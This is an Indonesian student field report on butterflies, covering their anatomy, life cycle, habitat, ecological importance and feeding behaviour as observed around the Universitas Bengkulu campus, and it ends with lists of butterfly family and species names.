KUPU-KUPU

BAB I
PENDAHULUAN

1.1. Latar Belakang
Kupu-kupu merupakan salah satu jenis satwa liar bangsa serangga yang memiliki keindahan warna dan bentuk sayap. Di alam, kupu-kupu memiliki nilai penting, yaitu sebagai penyerbuk pada proses pembuahan bunga. Hal ini secara ekologis turut memberi andil dalam mempertahankan keseimbangan ekosistem dan memperkaya keanekaragaman hayati. Biasanya hidup pada habitat teresterial dan komposisi jenisnya bervariasi menurut kondisi habitatnya. Keanekaragaman jenis kupu-kupu dan habitatnya sangat luas dari dataran rendah sampai hutan pegunungan tinggi, 0 - 2000 mdpl (Sihombing, 1999). Pekarangan rumah merupakan salah satu habitat kupu-kupu. Keberadaan kupu-kupu dipengaruhi oleh komposisi vegetasi dan kondisi lingkungan sekitar serta besarnya gangguan manusia. Secara ekonomi, kupu-kupu mempunyai nilai jual yang tinggi dan merupakan obyek rekreasi. Potensi ekonomi inilah yang menyebabkan kupu-kupu banyak diburu oleh wisatawan mancanegara, baik untuk dinikmati keindahannya di alam bebas maupun untuk dikoleksi sebagai kenang-kenangan, atau untuk kepentingan ilmu pengetahuan. (Tikupadang dan Gunawan, 1977). Kelangsungan hidup kupu-kupu sangat ditunjang dengan tersedianya tumbuhan sebagai sumber pakan, baik pada tahap larva (ulat), maupun pada tahap imago (kupu-kupu dewasa), dan tersedianya tumbuhan yang dapat berfungsi sebagai pelindung. Disamping itu, juga diperlukan factor cahaya yang cukup, udara yang bersih, dan air sebagai materi yang dibutuhkan untuk menjaga kelembaban linkungan dimana kupu-kupu tersebut hidup. Kupu-kupu dewasa rata-rata berumur satu bulan. di alam liar umurnya lebih pendek karena predator, penyakit, maupun faktor lain. yang ekstrem seperti kupu-kupu monarch, mourning cloak, dan tropical heliconian yang bisa hidup hingga sembilan bulan, kupu-kupu terkecil hanya berumur satu minggu (North American Butterfly Association ).
Kupu-kupu hidup dari nektar bunga, beberapa menyukai cairan yang dihisap dari buah-buahan yang jatuh di tanah dan membusuk, daging bangkai, kotoran burung dan tanah basah. Kupu-kupu termasuk jenis serangga dalam pengkelasannya di kelompokan sebagai order Lepidoptera, yakni serangga yang sayapnya ditutupi oleh sisik. Jumlah jenis kupu-kupu yang telah diketahui di seluruh dunia diperkirakan ada sekitar 13.000, dan mungkin beberapa ribu jenis lagi yang belum di determinasi (Stokoe, W.J., 1982). Kupu kupu termasuk hewan yang membantu penyerbukan tumbuh-tumbuhan yang di sebut dengan polinator. Kupu-kupu hidup hampir di seluruh penjuru dunia. Sama seperti serangga lainnya, kupu-kupu memiliki tiga bagian tubuh dan sepasang antena. Dan uniknya seluruh tubuh kupu kupu di liputi dengan sesor berupa bulu-bulu halus.
1.2. Tujuan Pengamatan
Tujuan dalam pengamatan ini adalah untuk mengetahui perilaku makan kupu-kupu. Diantaranya: berapa lama waktu yang digunakan kupu-kupu untuk hinggap pada tanaman, tanaman jenis apa yang disukai oleh kupu-kupu, selang waktu yang dibutuhkan untuk menghisap sari-sari makanan.

1.3. Manfaat
Hasil pengamatan ini diharapkan dapat menambah pengetahuan dan wawasan tentang perilaku makan kupu-kupu.


BAB II
TINJAUAN PUSTAKA

2.1. Anatomi Kupu-kupu
Bagian anatomi Kupu-Kupu yaitu :

Bagian kepala (head), pada kepala kupu-kupu terdapat mata, mulut dan sepasang antena sebagai alat sensor. Kupu kupu memiliki mulut yang berbentuk tabung menggulung (seperti belalai) yang berfungsi untuk mengambil sari bunga (nektar). Bagian dada (thorax), pada bagian dada kupu-kupu terdapat tiga pasang kaki dan empat buah sayap. Pada dada terdapat otot-otot untuk menggerakan kaki dan sayap. Bagian perut (abodemen). Jantung, sistem pencernaan dan organ kelamin juga terdapat pada bagian ini.

2.2. Siklus Hidup Kupu-Kupu
Kupu-kupu betina lebih memilih pasangan kawinnya yang memiliki pupil alias titik putih pada sayapnya.

Kupu-kupu betina tertarik pada kilauan cahaya yang dihasilkan dari pantulan cahaya ultraviolet oleh pupil, lingkaran putih yang berada di pusat ornamen berbentuk lingkaran di sayap. Sebaliknya bentuk ornamen sayap, warna, dan ukurannya tidak terlalu dipedulikan.Siklus hidup kupu-kupu dijalani dalam empat fase, yaitu fase telur, fase larva, pupa, dan imago (dewasa). Penampilan, peranan, dan aktivitas dari masing-masing fase berbeda. Telur dapat ditemukan di bawah permukaan daun inangnnya. Larva atau ulat merupakan fase makan, yang bisanya memakan daun tanaman inangnya. Dalam masa hidupnya larva mengalami beberapa kali tahapan moulthing yaitu pengelupasan dan pergantian kulit yang disebut fase instar. Proses untuk menjadi pupa didahului oleh adanya moulthing pada instar terakhir. Kulit pupa yang baru berganti ini masih basah dan lunak. Setelah kurang lebih satu minggu kulit pupa akan mengeras. Setelah fase pupa, lahirlah imago. Sehari setelah menetas, imago sudah dapat melakukan kopulasi. Seekor betina hanya dapat dikawini oleh seekor imago jantan. Imago betina yang akan bertelur mencari daun untuk meletakkan telurnya (Karangan, 1996).

• Fase I (fase telur atau ovum).
Telur kupu-kupu mempunyai bentuk yang berbeda-beda berdasarkan jenis. Ada beberapa telur diantaranya yang kulitnya seperti karet dan melengket, ada yang berbintik-bintik atau ditutupi oleh sesuatu yang berbentuk jala, sedang yang lainnya pada umumnya licin. Pada bagian atas dari telur akan terlihat suatu cekungan bila kita menggunakan mikroskop yang baik. Bentuk telurnya juga beraneka ragam, tergantung dari jenisnya. Ada yang berbentuk spiral, oval, bulat atau plat. Waktu yang dibutuhkan dari telur untuk menjadi larva berbeda-beda pada setiap jenis. Sebagai contoh misalnya pada jenis Graphium agamemnon membutuhkan waktu 5 – 7 hari, Troides hypolitus cellularis 8 –10 hari, sedangkan Papilio satapses membutuhkan waktu 4 –6 hari.
• Fase II (fase larva/ulat atau caterpillar).
Fase caterpillar berbeda-beda waktunya pada setiap jenis. Ada yang waktunya sangat pendek, ada pula yang hanya beberapa minggu, tetapi yang lainnya mungkin berbulan-bulan, baru bisa berkepompong. Sebagai contoh misalnya pada jenis Graphium agamemnon membutuhkan waktu sekitar 17 hari untuk menjadi kepompong, Troides hypolitus cellularis 28 hari, sedangkan pada Papilio satapses membutuhkan waktu 23 – 24 hari.
Setiap jenis mempunyai bentuk, warna dan bulu ulat yang berbeda, dan memakan pakan yang berbeda pula. Itulah sebabnya, kupu-kupu akan meletakkan telurnya pada pakan dimana akan menjadi makanan dari ulat bila kelak telur telah menetas. Biasanya larva kupu-kupu mempunyai alat perlindungan dari serangan predator, yakni mengeluarkan osmeterium, yaitu semacam zat beracun yang berbau tidak enak melalui suatu alat seperti antena pada bagian kepala dari ulat tersebut.
• Fase III (fase kepompong atau pupa)
Jika pertumbuhan larva telah sempurna, maka larva mencari tempat-tempat khusus untuk melakukan transformasi dan dapat saja meninggalkan sumber pakannya atau memasukkan dirinya kedalam tanah. Pada pase pupa, ulat akan mengalami fase istirahat dimana fase ini digunakan untuk membentuk sel-sel imago dan merupakan masa persiapan untuk penggantian kulit sebelum terjadi pergantian kulit yang tetap pada fase imago.
Setiap jenis mempunyai bentuk dan warna pupa yang berbeda. Sebagai contoh misalnya Graphium agamemnon mempunyai pupa berwarna hiaju muda yang lambat laun akan berubah menjadi abu-abu, sedangkan pada Papilio satapses mempunyai pupa yang berwarna hijau kekuningan, yang lambat laun akan berubah menjadi coklat. Sedangkan waktu yang dibutuhkan dari pupa menjadi imago juga berbeda pada setiap jenis. Graphium agamemnon membutuhkan waktu 14 hari, Troides hypolitus cellularis 28 hari, sedangkan Papilio satapses membutuhkan waktu jug 14 hari.
• Fase IV (fase kupu-kupu atau imago)
Pada fase ini ulat yang berkepompong telah berubah menjadi kupu-kupu yang sebenarnya. Kupu-kupu tersebut telah diperlengkapi dengan alat yang penting untuk digunakan atau cocok untuk digunakan pada ranting, atau objek lainnya dimana kupu-kupu ini akan menggantung atau bertengger yang biasanya dalam posisi yang terbalik dan merupakan posisi penting dalam mengambil tempat. Peralatan ini adalah berupa sayap, antena untuk mencium, probosis (belalai) digunakan untuk mengisap atau memakan, dan kaki untuk bertengger. Setiap jenis mempunyai umur imago yang berbeda-beda. Pada jenis Graphium agamemnon, umur imago bisa mencapai 50 – 59 hari, Troides hypolitus 9 - 10 hari, sedangkan Papilio satapses hanya berumur 13 - 14 hari.
Umumnya kupu-kupu dapat ditemukan hampir pada setiap habitat. Komponen habitat yang penting bagi kehidupan kupu-kupu adalah tersedianya vegetasi sebagai sumber makanan, sebagai tempat berlindung dari serangan predator atau gangguan lainnya, dan tempat untuk berkembang biak. Ada dua bentuk umum metamorphosis yaitu:HOLOMETABOLA dan PAUROMETABOLA. Holometabola adalah metamorfosis sempurna, yang proses menuju dewasa melibatkan ketiga unsur ganti diatas, ganti kulit, ganti ujud dan ganti ukur. Contohnya, pada kupu-kupu, jalan hidupnya harus dilalui dari telur, ulat,kepompong dan akhirnya berakhir pada kupu-kupu cantik dewasa. Sedang, paurometabola adalah metamorfosis setengah sempurna, yang proses menuju dewasa hanya melibatkan unsur ganti kulit dan ganti ukur. Contohnya, Jangkrik, dari telur, ke jangkrik muda yang bentuknya hampir mirip dengan jangkrik tua dan akhirnya menjadi jangkrik tua.

2.3. Habitat Kupu-kupu
Kupu-kupu hidup hampir di seluruh permukaan bumi, baik yang beriklim panas maupun yang beriklim dingin, dataran rendah maupun dataran tinggi. Habitat kupu-kupu adalah tempat lembab yang memiliki banyak vegetasi bunga, badan-badan perairan dan banyak mendapat sinar matahari. Jenis kupu-kupu banyak di temukan di daerah hutan hujan tropis. Ada sekitar 28.000 jenis kupu-kupu di dunia. Kupu-kupu dapat terbang jika temperatur badannya di atas 80 derajat Fahrentheit jika kurang kupu-kupu akan melakukan pemanasan sebelum terbang. Kupu-kupu dapat terbang paling cepat sekitar 30 Mph (mil per jam) dan yang paling lambat. sekitar 5 Mph. Kupu-kupu Swallowtail betina dengan ukuran sekitar 5 sampai 28 cm mampu bertelur lebih dari 500 butir.

2.4. Faktor ekologi yang mempengaruhi kehidupan kupu-kupu
Ada beberapa faktor yang berpengaruh terhadap kehidupan kupu-kupu, yakni mulai dari fase telur sampai fase imago, yaitu :
1. Distribusi dan kelimpahan sumber makanan ulat.
Distribusi sumberdaya dan kelimpahan makanan ulat adalah merupakan salah satu faktor penting yang mempengaruhi kelangsungan hidup ulat kupu-kupu. Semakin tinggi kelimpahan, akan menyebabkan pula ketersedian pakan ulat semakin banyak Sedangkan distribusi pakan akan berpengaruh kepada ketersediaan ruang dalam mencari pakan dan sekaligus berpengaruh terhadap sebaran jenis kupu-kupu.
2. Ketersediaan cairan nektar yang diisap oleh imago.
Semakin banyak cairan nektar yang tersedia, yang dicirikan oleh kelimpahan tumbuhan berbunga penghasil nektar, akan semakin banyak pula imago yang datang mengunjungi tempat tersebut. Selain cairan nektar dari bunga-bungaan, kupu-kupu juga mengisap cairan dari bangkai atau cairan pembuangan air senih dari hewan dan manusia.
3. Iklim.
Kelembaban adalah salah satu faktor iklim yang sangat penting bagi kupu-kupu. Pada umumnya kupu-kupu menyukai habitat yang mempunyai kelembaban tinggi, seperti lokasi-lakasi yang berada dipinngir sungai yang jernih atau dibawah tegakan pohon sekitar gua yang lembab karena berair.
4. Organisme lain.
Termasuk predator yang mengancam kupu-kupu, ataupun tumbuhan perdu maupun pohon yang digunakan oleh kupu-kupu sebagai tempat perlindungan, baik pada waktu hujan ataupun pendinmginan tubuh dari sengatan matahari panas, maupun dari serangan predator itu sendiri.
5. Kerusakan alami.
Banyak kerusakan alami yang menghancurkan habitat kupu-kupu, sehingga kupu-kupu tersebut bermigrasi untuk mencari habitat yang lebih bagus. Kerusakan alami yang dimaksud seperti longsoran, kemarau panjang, banjir dll.
6. Kerusakan oleh manusia.
Kerusakan habitat oleh manusia adalah merupakan faktor penting dan mungkin penyebab yang paling besar pengaruhnya terhadap menurunnya populasi atau bahkan menyebabkan punahnya satu jenis kupu-kupu. Kerusakan habitat oleh manusia dapat berupa penebangan pohon sehingga menggangu kelembaban, pengambilan daun dan buah serta ranting kayu yang tidak terseleksi menyebabkan persaingan pakan terhadap larva kupu-kupu, atau mungin menginjak tumbuhan bawah dimana telur dan larva kupu-kupu berada.
7. Kebersihan lingkungan pada habitat kupu-kupu.
Kebersihan lingkungan habitat kupu-kupu adalah merupakan salah satu faktor yang berpengaruh terhadap kehadiran kupu-kupu tersebut di suatu tempat. Membuang sampah sembarangan, akan mengundang serangga lain datang kesitu, dan secara tidak langsung akan mengundang pula predator kupu-kupu untuk datang ketempat tersebut.

2.5. Nilai Penting Kupu-Kupu.
Kupu-kupu mempunyai nilai yang sangat penting, dan dapat dikelompokkan kedalam nilai ekonomi, ekologi, endemisme, konservasi, estetika, pendidikan dan nilai budaya.
1. Nilai Ekonomi.
Ada beberapa jenis kupu-kupu yang mempunyai nilai ekonomi penting karena mempunyai harga jual di pasaran cukup tinggi. Bukan hanya imagonya yang dapat dijual dalam bentuk cendera mata, tetapi justru kepompong mempunyai nilai ekspor yang cukup tinggi
2. Nilai Estetika.
Kupu-kupu mempunyai nilai estetika yang sangat tinggi karena warna dari sayapnya yang menawan dan sangat artistik. Warna-warna ini kadang-kadang merupakan kamuplase sebagai startegi untuk menghindari atau menakuti predator.
3. Nilai Pendidikan
Kupu-kupu mempunyai nilai pendidikan yang tinggi, dimana para pelajar dan mahasiswa dapat melakukan penelitian terhadap berbagai aspek kupu-kupu tersebut.
4. Nilai Endemisme
Beberapa jenis kupu-kupu mempunyai nilai endemisme, baik berupa endemisme regional, pulau maupun endemisme lokal. Jenis endemisme lokal sangat rentan terhadap kepunahan, sehingga memerlukan perhatian yang besar.
5. Nilai Konservasi
Beberapa jenis kupu-kupu mempunyai nilai konservasi yang tinggi karena statusnya yang terancam punah. Hal ini juga berlaku bagi jenis kupu-kupu endemik, terutama yang statusnya endemik local.
6. Nilai Budaya
Masyarakat telah lama memanfaatkan sumberdaya kupu-kupu, baik untuk dijual atau sekedar dijadikan hiasan. Bahkan akhir-akhir ini, masyarakat telah mempu membuat soufinir dari sayap kupu-kupu yang disusun dalam bentuk dekoratif dan bernilai senih yang indah.


BAB III
Hasil Dan Pembahasan

3.1. Waktu dan Tempat Pengamatan
Pengamatan dilakukan di sekitar kampus Universitas Bengkulu, tepatnya di depan perpustakaan, jembatan menuju GKB 3 dan disekitar Basic sciens.

3.2. Bahan dan Alat yang digunakan
Bahan dan alat yang digunakan adalah buku, pena, stopwatch, Hp.

3.3. Cara Kerja
Pengamatan dilakukan dengan mengamati aktifitas kupu-kupu mencari makan, mencatat berapa lama kupu-kupu menghisap sari makanan, hinggap, terbang, dan kembali lagi melakukan aktifitas yang sama.

3.4. Hasil dan Pembahasan
Kupu-kupu umumnya hidup dengan mengisap madu bunga (nektar/ sari kembang). Akan tetapi beberapa jenisnya menyukai cairan yang diisap dari buah-buahan yang jatuh di tanah dan membusuk, daging bangkai, kotoran burung, dan tanah basah.
Pada pengamatan yang dilakukan dapat diketahui bahwa, kupu-kupu mulai beraktifitas mulai pukul 07.40. Dimana aktifitas kupu-kupu bergantung kepada cuaca, jika cuaca cerah maka kupu-kupu akan melaksanakan aktifitasnya hingga pukul 15.30. Pada awalnya dilihat pada pukul 07.40 kupu-kupu mulai berkeliaran, kemudian mencari tanaman yang biasanya berbunga dan memiliki warna yang mencolok dan mempunyai bau. Dari hasil pengamatan diketahui bahwa kupu-kupu pada awalnya akan mendatangi tanaman atau daerah yang sama, dimana biasanya kupu-kupu menemukan sumber makanannya. Setelah itu kupu-kupu mulai hinggap pada tanaman dan mendekati sumber makanan yaitu bunga. Kupu-kupu mulai sampai pada tangkai bunga, dan proses ini terjadi kurang lebih selama 15-25 detik, sebelum kupu-kupu hinggap lagi pada bunga yang lain. Setelah hinggap pada tangkai bunga, pelan-pelan kupu-kupu sampai pada sumber, dan menghisap sari bunga kurang lebih membutuhkan waktu 2-10 detik, dan kemudian mencari bunga lain, tidak menutup kemungkinan kalau nanti kupu-kupu akan kembali pada bunga yang sama. Perilaku yang sama akan terjadi terus-menerus dalam proses kupu-kupu mencari makan. Jika pada saat kupu-kupu menghisap sari bunga, dan kemudian ada gangguan dari lingkungan, maka kupu-kupu dengan segera meninggalkan sumber makanan. Spesies kupu-kupu yang berbeda maka berbeda pula perilaku kupu-kupu dalam mencari makan. Dari hasil pengamatan, dapat diketahui kupu-kupu yang diamati merupakan salah satu spesies dari family papilionidae.

Famili Papilionidae

Scarce Swallowtail Blue Mormon Common Mime

Famili Pieride

Green-veined White The Orange Tip Common Brimstone

Famili Riodinidae

Punchinello Tailed Judy Lange's Metalmark

Famili Nymphalidae

Rama-rama monarch Common Nawab Morpho Rhetenor Helena
Famili Lycaenidae

Red Pierrot Small Copper Banded Blue Pierrot